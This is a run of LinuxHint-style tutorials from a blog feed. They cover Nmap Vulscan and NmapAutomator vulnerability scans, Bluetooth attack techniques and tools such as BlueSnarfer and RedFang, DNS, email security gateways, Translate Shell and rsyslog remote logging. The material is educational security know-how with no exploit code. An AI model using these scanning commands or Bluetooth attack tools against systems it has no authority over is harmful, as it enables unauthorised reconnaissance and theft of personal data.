Hacking distributions like Kali Linux, BlackArch, Parrot OS, etc. include formidable tools to test your own environment; you can always run attacks against yourself to audit your security. All the distributions mentioned in this category bring tools to audit your local network, such as Aircrack-ng, Reaver, Wireshark, Nmap and additional tools capable of testing your own security.

Kali Linux can be downloaded from its official website at: https://www.kali.org/
Parrot OS Linux can be downloaded from its official website at: https://parrotlinux.org/
Black Arch Linux can be downloaded from its official website at: https://blackarch.org/

All of them are also available as live distributions to be used upon need.

I hope you found this article on secure Linux distros useful. Keep following LinuxHint for more tips and updates on Linux and networking.

]]>
How to use nmap vulscan https://linuxhint.com/nmap_vulscan/ Tue, 04 Feb 2020 18:37:04 +0000 https://linuxhint.com/?p=54574 Vulscan is a Nmap Scripting Engine script which helps Nmap find vulnerabilities on targets based on service and version detection, estimating vulnerabilities according to the software listening on the target.

This tutorial shows how to install Vulscan and carry out a scan with it. Vulscan results tend to show a long list of possible vulnerabilities, checking the database entries against each service detected on the target.

To begin installing Vulscan using git, run:

# git clone https://github.com/scipag/vulscan scipag_vulscan

Note: you can install git by running apt install git

Then run:

# ln -s `pwd`/scipag_vulscan /usr/share/nmap/scripts/vulscan
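Optionally, you can confirm the symlink resolves and ask Nmap to print the script's built-in help (the paths below assume the default Debian scripts directory):

# ls -l /usr/share/nmap/scripts/vulscan/vulscan.nse

# nmap --script-help vulscan/vulscan.nse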

To begin with a minimal scan run:

# nmap -sV --script=vulscan/vulscan.nse linuxhint.com

Analyzing the Vulscan output:

The first lines show the characteristics of the scan, such as the Nmap version, timing, and preliminary info on the target such as its state.


# nmap -sV --script=vulscan/vulscan.nse linuxhint.com
Starting Nmap 7.70 ( https://nmap.org ) at 2020-01-29 20:14 -03
Nmap scan report for linuxhint.com (64.91.238.144)
Host is up (0.23s latency).

Then it starts reporting on available services, contrasting them against the Vulscan vulnerability database. As you can see below, after detecting that the SSH port is open, Vulscan starts running checks for vulnerabilities affecting this specific service:

IMPORTANT NOTE: to keep this tutorial readable, 90% of the executed checks for each service were removed; all you need to know is that every vulnerability in the database for a specific detected service will be checked.


Not shown: 978 closed ports
PORT           STATE   SERVICE      VERSION
22/tcp   open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| vulscan: VulDB - https://vuldb.com:
| [12724] OpenSSH up to 6.6 Fingerprint Record Check sshconnect.c verify_host_key HostCertificate
weak authentication
|
| MITRE CVE - https://cve.mitre.org:
| [CVE-2012-5975] The SSH USERAUTH CHANGE REQUEST feature in SSH Tectia Server 6.0.4 through 6.0.20,
6.1.0 through 6.1.12, 6.2.0 through 6.2.5, and 6.3.0 through 6.3.2 on UNIX and Linux, 
when old-style password authentication is enabled, allows remote attackers to bypass authentication
 via a crafted session involving entry of blank passwords, as demonstrated by a root login session 
from a modified OpenSSH client with an added input_userauth_passwd_changereq call in sshconnect2.c.

| [CVE-2012-5536] A certain Red Hat build of the pam_ssh_agent_auth module on Red Hat Enterprise
Linux (RHEL) 6 and Fedora Rawhide calls the glibc error function instead of the error function
in the OpenSSH codebase, which allows local users to obtain sensitive information from process
memory or possibly gain privileges via crafted use of an application that relies on this module,
as demonstrated by su and sudo.

| [CVE-2010-5107] The default configuration of OpenSSH through 6.1 enforces a fixed time limit
between establishing a TCP connection and completing a login, which makes it easier for remote
attackers to cause a denial of service (connection-slot exhaustion) by periodically making many
new TCP connections.

| [CVE-2008-1483] OpenSSH 4.3p2, and probably other versions, allows local users to hijack
forwarded X connections by causing ssh to set DISPLAY to :10, even when another process is
listening on the associated port, as demonstrated by opening TCP port 6010 (IPv4) and
sniffing a cookie sent by Emacs.

Below you can see that port 25 is filtered, probably by a firewall, or Vulscan is unable to determine its state with certainty. It then checks port 80, finds it open and detects Nginx behind it, and again, as with the previously detected OpenSSH, Vulscan runs tests to confirm or discard all vulnerabilities contained in the database.


25/tcp   filtered smtp
80/tcp   open          http              nginx
|_http-server-header: nginx
| vulscan: VulDB - https://vuldb.com:
| [133852] Sangfor Sundray WLAN Controller up to 3.7.4.2 Cookie Header nginx_webconsole.php
Code Execution
| [132132] SoftNAS Cloud 4.2.0/4.2.1 Nginx privilege escalation
| [131858] Puppet Discovery up to 1.3.x Nginx Container weak authentication
| [130644] Nginx Unit up to 1.7.0 Router Process Request Heap-based memory corruption
| [127759] VeryNginx 0.3.3 Web Application Firewall privilege escalation
| [126525] nginx up to 1.14.0/1.15.5 ngx_http_mp4_module Loop denial of service
| [126524] nginx up to 1.14.0/1.15.5 HTTP2 CPU Exhaustion denial of service
| [126523] nginx up to 1.14.0/1.15.5 HTTP2 Memory Consumption denial of service
| [119845] Pivotal Operations Manager up to 2.0.13/2.1.5 Nginx privilege escalation
| [114368] SuSE Portus 2.3 Nginx Certificate weak authentication
| [103517] nginx up to 1.13.2 Range Filter Request Integer Overflow memory corruption

Finally, Nmap will show all filtered ports found:


|_
1666/tcp filtered netview-aix-6
2000/tcp filtered cisco-sccp
2001/tcp filtered dc
2002/tcp filtered globe
2003/tcp filtered finger
2004/tcp filtered mailbox
2005/tcp filtered deslogin
2006/tcp filtered invokator
2007/tcp filtered dectalk
2008/tcp filtered conf
2009/tcp filtered news
2010/tcp filtered search
6666/tcp filtered irc
6667/tcp filtered irc
6668/tcp filtered irc
6669/tcp filtered irc
9100/tcp filtered jetdirect
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 632.44 seconds

From the scan above we can see the process: find the available services and then run tests for every known vulnerability of each detected service contained in the Vulscan vulnerability database.

You can allow Nmap version detection while omitting Vulscan version detection by adding the flag --script-args vulscanversiondetection=0.

# nmap -sV --script=vulscan/vulscan.nse --script-args vulscanversiondetection=0 linuxhint.com

Vulscan allows you to launch interactive scans in which you decide whether a specific service must be scanned for vulnerabilities; to achieve it, apply the option --script-args vulscaninteractive=1.

On the console run:

#  nmap -sV --script=vulscan/vulscan.nse --script-args vulscaninteractive=1 linuxhint.com

The scan will halt to ask you if it should proceed checking vulnerabilities for Nginx:

The argument vulscanshowall allows printing results according to accuracy: the lowest value prints all results, while increasing the value reduces the results to better matches.

# nmap -sV --script=vulscan/vulscan.nse --script-args vulscanshowall=1 linuxhint.com

The following options determine the format in which Nmap shows the output. The option vulscanoutput=details enables the most descriptive output; by running it, Nmap shows additional information for each script.

# nmap -sV --script=vulscan/vulscan.nse --script-args vulscanoutput=details linuxhint.com

The listid option will print the results as a list of vulnerabilities identified by their ID.

# nmap -sV --script=vulscan/vulscan.nse --script-args vulscanoutput=listid linuxhint.com

The option listlink prints a list of links to the vulnerabilities database with additional information on each one.

# nmap -sV --script=vulscan/vulscan.nse --script-args vulscanoutput=listlink linuxhint.com

Finishing with output formats, the option listtitle will print a list of vulnerabilities by name.

# nmap -sV --script=vulscan/vulscan.nse --script-args vulscanoutput=listtitle linuxhint.com

Finally, to end this tutorial, keep in mind that for Vulscan to give its best results you must keep its databases up to date. To update the Vulscan databases, always download the latest version of the database files and save them in Vulscan's main directory (where the databases with the same names are already stored).
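As a rough sketch, assuming the database file names shipped with Vulscan (cve.csv, exploitdb.csv, openvas.csv, osvdb.csv, scipvuldb.csv, securityfocus.csv, securitytracker.csv and xforce.csv, names may differ in newer versions) and using <Database-URL> as a placeholder for the download location published in the Vulscan README, an update could look like this:

# for db in cve exploitdb openvas osvdb scipvuldb securityfocus securitytracker xforce; do wget -O /usr/share/nmap/scripts/vulscan/$db.csv <Database-URL>/$db.csv; done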

I hope you found this tutorial on how to use Nmap Vulscan useful, keep following LinuxHint for more tips and updates on Linux.

]]>
Translate words from English into other language on Linux Terminal https://linuxhint.com/translate_language_on_linux_terminal/ Tue, 04 Feb 2020 18:30:33 +0000 https://linuxhint.com/?p=54588 This tutorial shows how to easily translate words from English into other languages on the Linux terminal. It also shows how to specify the source language or more than one destination language, how to identify languages without carrying out the translation process, and other useful techniques to deal with languages from the terminal.

For this tutorial the software used is Translate Shell, previously known as Google Translate CLI.

Translate Shell allows you to use Google Translate, Bing Translator, Yandex Translator and Apertium from the command line; while it includes all the translation engines mentioned, Google is the default one.

Before downloading Translate Shell you need to get the gawk package by running:

# apt install gawk -y

Once installed download Translate Shell using wget by running:

# wget git.io/trans

Note: on Debian and Debian-based Linux distributions you can install wget by running apt install wget.

Once downloaded give Translate Shell execution rights by running:

# chmod +x trans

Let's try it by translating a single word from Italian (to English, since English is the default destination language). To translate the word pinguino run:

Translate a single word on Linux terminal:

# ./trans 'pinguino'

Note: using quotation marks is optional for single words and mandatory for sentences.

As you can see, Translate Shell detected the source language as Italian and translated it to English even though the destination language wasn't specified.

Now let’s translate the same word from English to Spanish. To specify a destination language use “:” followed by the destination language as in the example below:

# ./trans :es penguin

As you can see, Translate Shell translated it properly.

Translate more than a single word on Linux terminal:

Now let's translate more than a single word. The following example shows the “Linux hint” translation; note that for more than a single word the quotation marks are mandatory.

# ./trans :es 'Linux hint'

Translate words from English into several other languages on Linux terminal:

Translate Shell also allows you to translate into several destination languages at once. The following example shows how to translate the sentence "At LinuxHint we seek the best content quality for readers" to Spanish and Chinese simultaneously by just separating the language codes with a + symbol:

# ./trans :es+zh 'At LinuxHint we seek the best content quality for readers'

Specify the source language when translating words into other language on Linux terminal:

Sometimes translators fail to auto-detect the source language. Translate Shell supports source language specification by placing the source language code before the colon:

# ./trans zh: '在LinuxHint,我们为读者寻求最佳的内容质量'

Specify both source and destination languages when translating on Linux terminal:

Of course you can specify both source and destination languages:

# ./trans zh:es '在LinuxHint,我们为读者寻求最佳的内容质量'

Detect languages on Linux Terminal using Translate Shell:

You can also use Translate Shell to detect languages only, without proceeding with the translation, obtaining additional information on the detected language by adding the -id flag as shown in the example below:

# ./trans -id "我们为读者寻求最佳的内容质量"

Translate files from English into other language on Linux terminal:

Translate Shell also allows you to translate files. Using nano or any text editor you want, create a text file with content in any language you want to translate in order to test Translate Shell.

# nano linuxhint-translation

Then press CTRL+X to save and exit

To translate the content to Spanish use the syntax shown below adding file://<Path-To-File> as content source to translate:

# ./trans :es file://linuxhint-translation

Translate websites into other language on Linux terminal:

With Translate Shell it is also possible to translate websites, using the syntax shown below to translate linuxhint.com.

# ./trans :es https://linuxhint.com

As you can see Translate Shell returned a URL with a version of LinuxHint in Spanish:

https://translate.google.com/translate?hl=en&sl=auto&tl=es&u=https://linuxhint.com

Translate words into other language on Linux terminal with interactive mode:

Translate Shell also offers an interactive mode; the following example shows how to launch it to translate content from Spanish to English:

# ./trans -shell es:en

Using Translate Shell as dictionary:

Translate Shell can also be used as a dictionary if the option -d is used; the following example shows Translate Shell being used as a dictionary for the word “encrypt”:

# ./trans -d en: encrypt

Play sound to include spoken translation in the output:

To end this tutorial, let's add sound to hear the translations. To achieve it you need to install a terminal media player such as mplayer; on Debian and Debian-based Linux distributions run:

# apt install mplayer -y

Once installed, use the option -p to add sound to the output. The following example shows how to translate from Chinese to Spanish including the spoken translation:
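A possible invocation, reusing the Chinese sentence from the earlier examples, would be:

# ./trans -p zh:es '在LinuxHint,我们为读者寻求最佳的内容质量'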

I hope you found this tutorial on how to translate words from English into other languages on the Linux terminal useful. Keep following LinuxHint for more tips and updates on Linux and networking.

]]>
What is DNS and how does it work https://linuxhint.com/what_is_dns/ Tue, 04 Feb 2020 18:25:56 +0000 https://linuxhint.com/?p=54571 This tutorial aims to explain, in the simplest way, what DNS (the Domain Name System) is and how it works. This article focuses on the most common processes and does not include exceptions (except for cached domains) in order to describe the whole process most domain name resolutions pass through. In this tutorial only IPv4 examples are given, but the process remains the same for the IPv6 protocol.

What is the DNS (Domain Name System)?

Every device on an IPv4/IPv6 network has a unique identifier, an address called an IP address (Internet Protocol address); this address allows the device to be identified and reached by other devices. Users familiar with IPv4 know that IP addresses consist of 4 octets ranging between 0 and 255, like 123.221.200.3.

Every website or service we communicate with on the internet has a unique IP address which allows us to reach it accurately; for example, if we want to reach Google we are reaching the IP address 172.217.172.110.

For humans, remembering each IP address for each website or service we use is impossible, or at least not a friendly way to remember website addresses, and that's where human-friendly domain names such as LinuxHint.com come to our aid.

While each device has a unique IP address, every IP address can be associated with a domain name to make it easier for humans to communicate with or find it.

Therefore, if you have a device from which you want to serve others, or which you want to be found easily, you can associate it with a human-friendly name, called a domain name, usually starting with www.

DNS (Domain Name System and NOT Domain Name Server) is the system through which domain names are translated into IP addresses. We can think about the Domain Name System as a translator from friendly www.domain.com to IPv4 addresses X.X.X.X (or IPv6 addresses too). And this “translation” process is called “DNS resolution”.

How does the DNS (Domain Name System) work?

The Domain Name System (DNS) is achieved through 4 different types of servers: the DNS recursive resolver, the Root Name Server, the Top-Level Domain Name Server and finally the DNS Name Server.

The whole sequence can be summarized as:

Your Browser > DNS Recursive Resolver > Root Name Server > Top Level Domain Server > DNS Name Server.

The DNS Recursive Resolver is the first step of the DNS resolution process; it is the server which receives the user's query and continues the resolution process (also called DNS lookup). The DNS Recursive Resolver receives the user's request to translate a domain name into an IP address and passes the request to a Root Name Server; the Recursive Resolver keeps a list containing all Root Name Server addresses in order to find them.

The Root Name Server is the second step in the process; it can answer the Recursive Resolver with cached information or refer the request to the Top Level Domain server (such as .com, .org, .net, .edu or .gov), which holds information on all domains belonging to that top level. So if the requested domain is a .com, the Top Level Domain server will be the .com TLD server; the request is then sent to the DNS name server which holds the IP address and returns it to the Recursive Resolver, which finally sends the client who requested the resolution the proper translation into an IP address.
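If you want to watch this delegation chain from the terminal, dig (available in the dnsutils package on Debian-based systems) can follow it step by step; the output lists the root servers first, then the .com TLD servers, and finally the authoritative name server returning the A record:

# dig +trace linuxhint.com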

The exception for the steps above is when a recent domain name resolution was saved in the cache by the Resolver.

The process described above is in many cases shortened due to DNS caching: the Recursive Resolver or the Root Server can keep domain name resolution information cached in order to increase performance and avoid the whole process. In such cases the domain resolution is faster and some of the servers mentioned above don't intervene. That's also the reason why, when we update DNS records at our hosting provider, the changes can take minutes or hours to take effect: the DNS caches need to refresh.

When a Recursive Resolver gets resolution information, it caches it so it can be reused for subsequent resolutions, saving the whole process explained before.
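You can observe caching yourself by resolving the same name twice and comparing the “Query time” field reported by dig; the second answer is normally much faster and shows a decreasing TTL because it is served from the resolver's cache:

# dig linuxhint.com
# dig linuxhint.com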

Linux has a variety of commands to deal with DNS resolution, which you can find at https://linuxhint.com/common_dns_tools/.

I hope you found this explanation of what DNS is and how it works useful. Keep following LinuxHint for more tips and updates on Linux and networking.

]]>
How to use Nmap automator https://linuxhint.com/nmapautomator/ Wed, 29 Jan 2020 11:15:51 +0000 https://linuxhint.com/?p=54253 This tutorial focuses on NmapAutomator, a Linux shell script which automates Nmap scanning tasks. NmapAutomator is an easy and fast alternative to scan targets; it includes different scan modes, including scanning for vulnerabilities by integrating additional tools such as Nikto or GoBuster. While it may be a good introduction to Nmap, this script has a few limitations, for example, it doesn't allow scanning domain names, only IP addresses.

Installing dependencies before using NmapAutomator:

Before starting with NmapAutomator let's solve some dependencies. The first one is Go, which you can download from https://golang.org/dl/.

Once downloaded, install it by extracting the content into the directory /usr/local by running:

# tar -C /usr/local -xzf go1.13.6.linux-amd64.tar.gz

Export the path by running:

# export PATH=$PATH:/usr/local/go/bin
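Note the export above only lasts for the current shell session; to keep it across logins you can append it to your shell profile:

# echo 'export PATH=$PATH:/usr/local/go/bin' >> ~/.profile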

Now let's install GoBuster, a security scanner, by running:

# go get github.com/OJ/gobuster

Finally, let's install Nikto by running:

# apt install libwhisker2-perl nikto

Now we can proceed to download NmapAutomator using git:

# git clone https://github.com/21y4d/nmapAutomator.git

Get inside the NmapAutomator directory and give the script execution permissions by running:

# chmod +x nmapAutomator.sh

Optionally, to be able to run it even when you aren't inside the directory, create a symlink using the full path:

# ln -s `pwd`/nmapAutomator.sh /usr/local/bin/nmapAutomator.sh

To be able to scan in Vulns mode you need to install the nmap-vulners script.
To do it, first clone the nmap-vulners repository by running:

# git clone https://github.com/vulnersCom/nmap-vulners.git

Then enter the nmap-vulners directory and copy the .nse files into the directory /usr/share/nmap/scripts:

# cp *.nse /usr/share/nmap/scripts

Finally, update the Nmap scripts database by running:

# nmap --script-updatedb

How to use NmapAutomator:

Let's scan linuxhint.com. As said previously, NmapAutomator doesn't work with domain names but only with targets identified by their IP address; to learn LinuxHint.com's IP address I use the command host:

# host linuxhint.com

Before proceeding with the scan, let's clarify that NmapAutomator supports the following scan types:

Quick scan: checks for open ports only.

Basic scan: first checks for open ports to specifically scan them later.

UDP scan: it is a basic scan but directed against UDP services.

Full scan: this mode scans the whole port range through a SYN Stealth scan and then carries out an additional scan on the open ports.

Vulns scan: this type of scan checks the target for vulnerabilities.

Recon: this option executes a Basic scan and then lets you launch an additional scanner such as Nikto.

All: this type runs all the scans previously mentioned, of course without duplicating tasks.

To begin with examples, let’s try the Quick scan against LinuxHint.

# ./nmapAutomator.sh 64.91.238.144 Quick

As you can see, the scan process was pretty fast and reported the open ports.

The following example shows the Basic mode, in which, after finding open ports, Nmap scans them to gather additional information.

#  ./nmapAutomator.sh 64.91.238.144 Basic

A zoomed extract of the results:

The following example shows a Basic scan focused on UDP ports:

#  ./nmapAutomator.sh 64.91.238.144 UDP

The following example shows the Vulns scan, for which we installed nmap-vulners.
First Nmap checks for available services on the target and then checks them for security holes or vulnerabilities, similarly to when we use the NSE (Nmap Scripting Engine) directly as shown at https://linuxhint.com/nmap-port-scanning-security/ or https://linuxhint.com/nmap_banner_grab/.

#  ./nmapAutomator.sh <Target> Vulns

As you can see, the Vulns type of scan revealed many possible vulnerabilities or security holes.

The following scan, Recon, is also interesting; for this mode you need to install additional scanners such as Nikto. This scan starts with a basic scan and then continues with a vulnerability scanner.

CLARIFICATION: in order to show real vulnerability reports, the first screenshot of the Recon scan shows LinuxHint but the vulnerability results belong to a different target.

#  ./nmapAutomator.sh 64.91.238.144 Recon

Select any additional scanner you want; I selected Nikto. If you want to learn more about Nikto you can read the article at https://linuxhint.com/nikto_vulnerability_scanner/.

Below you can see Nikto’s reports on found vulnerabilities:

As you can see, many vulnerabilities were found, probably including many false positives, which is usual when scanning for vulnerabilities.

Below you can see an example of a Full mode scan:

#  ./nmapAutomator.sh 64.91.238.144 Full

Conclusion on NmapAutomator:

NmapAutomator turned out to be a very nice tool despite its inability to scan domain names. As you could see, the script managed to direct Nmap properly, finding a lot of vulnerabilities. The integration with additional scanners like Nikto is very useful and represents, to my taste, the biggest advantage of this script.

If you don't have time to read up on Nmap or deal with GUI scanners such as OpenVAS or Nessus, this script is a great solution to launch complex scans quickly and simply.

I hope you liked this tutorial on how to use NmapAutomator.

]]>
Best Open Source Secure Email Gateway Packages https://linuxhint.com/best_open_source_secure_email_gateway/ Tue, 28 Jan 2020 12:13:04 +0000 https://linuxhint.com/?p=54152 Secure Email Gateways, or email security gateways, are gateways designed to filter mail traffic. Some mail providers and other types of organizations implement this solution to fight attacks like phishing, email-borne attacks, viruses and malware, and it can also prevent information leaks by disloyal members of the organization, etc. It is a mail content controller which acts according to specified rules and policies.

Email Secure Gateways are available as a cloud service, as a virtual appliance or locally on the mail server, and there are both software and hardware solutions, but this article focuses on 5 Email Security Gateways: MailScanner, MailCleaner, Proxmox, Hermes Secure Email Gateway and OrangeAssassin; all of them include free versions while some offer additional paid versions with extra features.

MailScanner

MailScanner is among the most popular open source solutions for secure email gateways. It prevents attacks through spam using SpamAssassin, viruses by integrating third party antivirus software such as ClamAV, phishing, malware and more.

MailScanner can be installed as a gateway or integrated with mail gateways such as MailCleaner, mentioned below in this article.

Installing MailScanner is pretty simple; you can get packages for Debian and Red Hat based Linux distributions at https://github.com/MailScanner/v5/tree/master/builds, and it is highly recommended to install it on a clean OS. Around 80 billion emails are supervised by MailScanner monthly, and it shows high performance on low-resource hardware too. A comprehensive guide of configuration options for MailScanner, to understand all its features, is available at https://www.mailscanner.info/MailScanner.conf.index.html.

MailCleaner

MailCleaner is another open source alternative for a secure email gateway. Like the rest of the solutions it features antispam, antivirus protection, quarantine, newsletter detection and a web based administration interface.

MailCleaner is ready to be installed on any virtualization platform and works as the MX record for the domain name. It is built on Debian 8 and uses MailScanner, which heads this list. Like the rest of the gateways it offers an intuitive web interface which unifies all functionalities. In addition to the community edition, MailCleaner offers paid add-ons (SpamHaus Professional RBLs and Kaspersky Antivirus). The paid version offers automatic updates every 15 minutes and access to professional anti-spam rules and antivirus, while the free version offers ClamAV and basic rules. The paid version also features an IP list to detect newsletters, in addition to the rules included in the free version. RBL and URIBL support also differ between the free and paid versions; the paid version includes an automatically updated Bayesian filter, managed setup, add-ons and premium support, while the community edition has support only through the forum. Still, in its free version MailCleaner is among the best open source solutions on the market.

MailCleaner email secure gateway can be downloaded from https://www.mailcleaner.org/download/.

Proxmox Mail Gateway

Proxmox Mail Gateway is another market-leading technology to filter mail threats. It is very user friendly, with a web management interface. It is a Debian-based virtualized system and can be downloaded from https://www.proxmox.com/en/downloads.

Proxmox works through many methods, which include receiver verification to confirm the email recipient is a real existing user. It also checks SPF (Sender Policy Framework) in order to validate the sender and prevent email forgery. DNS-based Blackhole Lists (DNSBL) are another method used by Proxmox, which checks for blacklisted IP addresses known for spam activity. It also features an SMTP whitelist which allows you to filter by email address, domain name, regular expressions and IP address; black and white lists are widely used in Proxmox and all other options mentioned in this article. It also can detect problematic domains through SURBL.

Auto-learning algorithms and a Bayesian filter complete this software, adding intelligence over time. Customizing Proxmox is pretty easy thanks to an object rule system which makes it easy to filter by users, domains, time frames and content, and to define measures to be taken according to scan results. Proxmox is, together with MailScanner, one of the best open source solutions on the market for a mail secure gateway.

Hermes Secure Email Gateway

Hermes Unified Secure Email Gateway is another Open Source solution based on Ubuntu Server. While Hermes Secure Email Gateway is open source, it is offered in 3 formats:

Hermes SEG Community: this is the free version without support (support is available through the forum), without warranty and without the possibility to self host all features.
Hermes SEG Pro: this license allows you to self host all features.
Hermes SEG SaaS: this service includes SEG Pro plus a management service.

Hermes Unified Secure Email Gateway helps to fight viruses, malware, spam and other threats such as mail forgery, aided by SPF, DKIM (DomainKeys Identified Mail) and DMARC (Domain-based Message Authentication, Reporting and Conformance). The “Unified” in its name refers to the integration of tools such as Postfix, SpamAssassin, ClamAV and others, whose management is unified through a single web interface, similarly to Proxmox. Hermes can be installed locally or as a cloud solution. You can get the community edition for free at https://github.com/deeztek/Hermes-Secure-Email-Gateway.

OrangeAssassin

OrangeAssassin is the last of this list, another free open source secure email gateway which supports incorporating plugins with additional features. OrangeAssassin portrays itself as an upgraded replacement for SpamAssassin. Among all the products listed in this article, OrangeAssassin is the least field-tested (the least used).

You can get OrangeAssassin for free at https://github.com/SpamExperts/OrangeAssassin.

Conclusion:

All the products mentioned are quite similar and user friendly, without major differences between them. Considering that 90% of email is spam, incorporating a Secure Email Gateway solution is a must if you plan to set up a mail server. All the solutions listed here are available for virtualized environments and can be tested without risk. Of all the solutions mentioned above, probably the most recommended by the community are MailScanner and MailCleaner.

I hope you found this article on Best Open Source Secure Email Gateway Packages useful.

]]>
BlueTooth Security Risks https://linuxhint.com/bluetooth_security_risks/ Thu, 23 Jan 2020 07:12:20 +0000 https://linuxhint.com/?p=53970 Security risks involving Bluetooth vulnerabilities include techniques known as bluebugging, bluesnarfing, bluejacking, denial of service and exploits for different security holes.

When a device is configured as discoverable, an attacker may try to apply these techniques.

Today mobile security has been strongly improved and most attacks fail, yet sometimes security holes are discovered and new exploits emerge. As mobile devices prevent the user from freely installing unmonitored software, most attacks are difficult to carry out.

This tutorial describes the most common Bluetooth attacks, the tools used to carry out these attacks and the security measures users can take to prevent them.

Bluetooth Security Risks:

Bluebugging:
This is the worst known type of Bluetooth attack; through it an attacker gets full control of the device. If the hacked device is a mobile phone, the attacker is able to make phone calls and send messages from the compromised device, remove or steal files, use the phone’s mobile connection, etc. Formerly a tool called Bloover was used to carry out this type of attack.

BlueSnarfing:
BlueSnarfing attacks target the device’s stored information such as media, contacts, etc., yet without granting the attacker full control over the device as other types of attacks do (like Bluebugging, described above).

Bluesniping:
Similar to BlueSnarfing but with a longer range; this attack is carried out with special hardware.

BlueJacking:
This attack consists of sending (only) information to the victim, such as adding a new contact or replacing a contact name with the desired message. This is the least damaging attack; although some tools may allow the attacker to reset or turn off the victim’s cell phone, it remains useless for stealing information or violating the victim’s privacy.

KNOB:
Recently, reports on a new kind of attack were released by researchers who discovered that the handshake process, or negotiation between 2 Bluetooth devices to establish a connection, can be hacked through a Man In the Middle attack by forcing a one-byte encryption key, allowing a brute force attack.

Denial of Service (DOS): widely known Denial of Service attacks also target Bluetooth devices; the BlueSmack attack is an example of this. These attacks consist of sending oversized packets to Bluetooth devices in order to provoke a DOS. Even attacks killing the battery of Bluetooth devices have been reported.

Tools used to hack Bluetooth devices:

Below is a list of the most popular tools used to carry out attacks through Bluetooth; most of them are already included in Kali Linux and Bugtraq.

BlueRanger:
BlueRanger locates Bluetooth device radios by sending L2CAP pings, exploiting the fact that pinging is allowed without authentication.
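The same L2CAP echo mechanism can be tested with the standard BlueZ l2ping utility, assuming you already know the target's MAC address (the placeholder below must be replaced with a real address):

# l2ping -c 3 <Target-MAC-Address>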

BlueMaho:
This tool can scan devices looking for vulnerabilities. It shows detailed information on scanned devices, as well as current and previous device locations, it can keep scanning the environment without limit and alert through sounds when a device is found, you can even define instructions for when a new device is detected, and it can be used with two Bluetooth devices (dongles) simultaneously. It can check devices for both known and unknown vulnerabilities.

BlueSnarfer:

BlueSnarfer, as its name says, was designed for BlueSnarfing; it allows the attacker to get the victim’s contact addresses, a list of made and received calls and the contacts saved in the SIM, and among its features it also allows customizing how the information is printed.

Spooftooph:
This tool allows you to carry out spoofing and cloning attacks against Bluetooth devices; it also allows generating random Bluetooth profiles and changing them automatically at a defined interval.

BtScanner:

BtScanner allows you to gather information from bluetooth devices without prior pairing. With BtScanner an attacker can get information on HCI (Host Controller Interface protocol) and SDP (Service Discovery Protocol).

RedFang:

This tool allows you to discover hidden Bluetooth devices which are set not to be discovered. RedFang achieves this through brute force, guessing the victim’s Bluetooth MAC address.

Protect your Bluetooth devices against security risks:

While new devices are not vulnerable to the attacks mentioned previously, new exploits and security holes emerge all the time.
The only safe measure is to keep Bluetooth turned off when you don’t use it; in the worst case, if you need it always turned on, at least keep it undiscoverable, although as you saw there are tools to discover hidden devices anyway.
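On most Linux systems the radio can be switched off from the terminal with rfkill, and the Bluetooth service can be kept from starting at boot with systemctl (these commands assume the BlueZ stack and systemd):

# rfkill block bluetooth

# systemctl disable bluetooth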

Your mobile devices, or devices with Bluetooth support, must remain updated; when a security hole is discovered the solution comes through updates, and an outdated system may contain vulnerabilities.

Restrict permissions on Bluetooth functionalities: some applications require Bluetooth access permissions; try to limit permissions on the Bluetooth device as much as possible.

Another point to take into consideration is our location when we use Bluetooth devices; enabling this functionality in public places full of people isn’t recommended.

And of course, you should never accept pairing requests, and if you get an unknown pairing request turn off your Bluetooth immediately; some attacks take place during the handshake negotiation (authentication).

Don’t use third party apps which promise to protect your Bluetooth; instead keep a safe configuration as said before: turn off or hide the device.

Conclusion:

While Bluetooth attacks aren’t widely used (compared with other types of attacks like phishing or DDOS), almost every person carrying a mobile device is a potential victim; therefore most people are exposed, also through Bluetooth, to sensitive data leaks. On the other hand, most manufacturers have already patched devices to protect them from almost all the attacks described above, but they can only issue a fix after the vulnerability has been discovered and published (as with any vulnerability).

While there is no defensive software, the best solution is to keep the device turned off in public spaces; since most attacks require a short range, you can use the device safely in private places. I hope you found this tutorial on Bluetooth Security Risks useful. Keep following LinuxHint for more tips and updates on Linux and networking.

]]>
How to Send Linux Logs to a Remote Server https://linuxhint.com/send_linux_logs_remote_server/ Thu, 23 Jan 2020 07:02:07 +0000 https://linuxhint.com/?p=53993 The main reason to apply remote logging is the same reason a dedicated /var partition is recommended: a matter of space, but not only that. By sending logs to a dedicated storage device you can prevent your logs from consuming all the space while keeping a large historical database to investigate bugs.

Uploading logs to a remote host allows us to centralize reports for more than one device and to keep a backup we can research in case a failure prevents us from accessing logs locally.

This tutorial shows how to set up a remote server to host logs, how to send these logs from client devices, and how to classify or divide logs into directories by client host.

To follow the instructions you can use a virtual device; I took a free tier VPS from Amazon (if you need help setting up an Amazon device there is great dedicated content on it on LinuxHint at https://linuxhint.com/category/aws/). Note the server's public IP is different than its internal IP.

Prior to starting:

The software used to send logs remotely is rsyslog. It comes by default on Debian and derived Linux distributions; in case you don’t have it, run:

# sudo apt install rsyslog

You can always check the rsyslog state by running:

# sudo service rsyslog status

As you can see, the status on the screenshot is active; if your rsyslog isn’t active you can always start it by running:

# sudo service rsyslog start

Or

# systemctl start rsyslog

Note: For additional information on all options to manage Debian services check Stop, start and restart services on Debian.

Starting rsyslog isn’t relevant right now because we will need to restart it after making some changes.

How to Send Linux Logs to a Remote Server: The Server Side

First of all, on the server edit the file /etc/rsyslog.conf using nano or vi:

# nano /etc/rsyslog.conf

Within the file, uncomment or add the following lines:

module(load="imudp")
input(type="imudp" port="514")
module(load="imtcp")
input(type="imtcp" port="514")

Above we uncommented (or added) log reception through UDP and TCP; you can allow only one of them or both. Once uncommented or added, you’ll need to edit your firewall rules to allow incoming logs. To allow log reception through TCP run:

# ufw allow 514/tcp

To allow incoming logs through UDP protocol run:

# ufw allow 514/udp

To allow logs through both TCP and UDP run the two commands above.
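You can verify the rules were added by running:

# ufw status numbered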

Note: for more information on UFW you can read Working with Debian Firewalls (UFW).

Restart rsyslog service by running:

# sudo service rsyslog restart

Now continue on the client to configure log sending; then we’ll get back to the server to improve the format.

How to Send Linux Logs to a Remote Server: The Client Side

On the client sending the logs, edit /etc/rsyslog.conf and add the following line, replacing the IP 18.223.3.241 with your server's IP.

*.* @@18.223.3.241:514

Exit and save changes by pressing CTRL+X.

Once edited restart the rsyslog service by running:

# sudo service rsyslog restart
